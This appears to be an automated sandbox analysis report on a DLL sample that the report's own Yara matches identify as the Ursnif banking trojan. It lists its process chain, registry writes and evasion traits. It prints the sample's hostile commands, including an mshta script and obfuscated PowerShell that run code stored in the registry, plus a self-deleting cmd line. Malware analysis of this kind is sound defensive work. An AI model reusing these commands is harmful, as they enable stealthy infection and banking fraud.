                      Source: Yara matchFile source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01065FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary

                      barindex
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: tIJVb0BvkI.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01064BF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01061645
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0106829C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0106190C GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01066D0A NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01064321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010684C1 NtQueryVirtualMemory,
                      Source: tIJVb0BvkI.dllBinary or memory string: OriginalFilenamemyfile.exe$ vs tIJVb0BvkI.dll
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: tIJVb0BvkI.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tIJVb0BvkI.dllReversingLabs: Detection: 47%
                      Source: tIJVb0BvkI.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220504Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3nzoxvm.isc.ps1Jump to behavior
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@24/15@0/2
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010668BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{E89B07B0-274E-5A75-F19C-4B2EB590AF42}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{E8676F4A-27AA-5A21-F19C-4B2EB590AF42}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: tIJVb0BvkI.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.578381495.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.582897274.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: tIJVb0BvkI.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.578381495.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.582897274.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0106828B push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01067EA0 push ecx; ret
                      Source: tIJVb0BvkI.dllStatic PE information: section name: .erloc
                      Source: tIJVb0BvkI.dllStatic PE information: real checksum: 0x79835 should be: 0x7529a
                      Source: 5xaibb03.dll.17.drStatic PE information: real checksum: 0x0 should be: 0xd18c
                      Source: 2tb3qiq3.dll.14.drStatic PE information: real checksum: 0x0 should be: 0x12ed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\tIJVb0BvkI.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
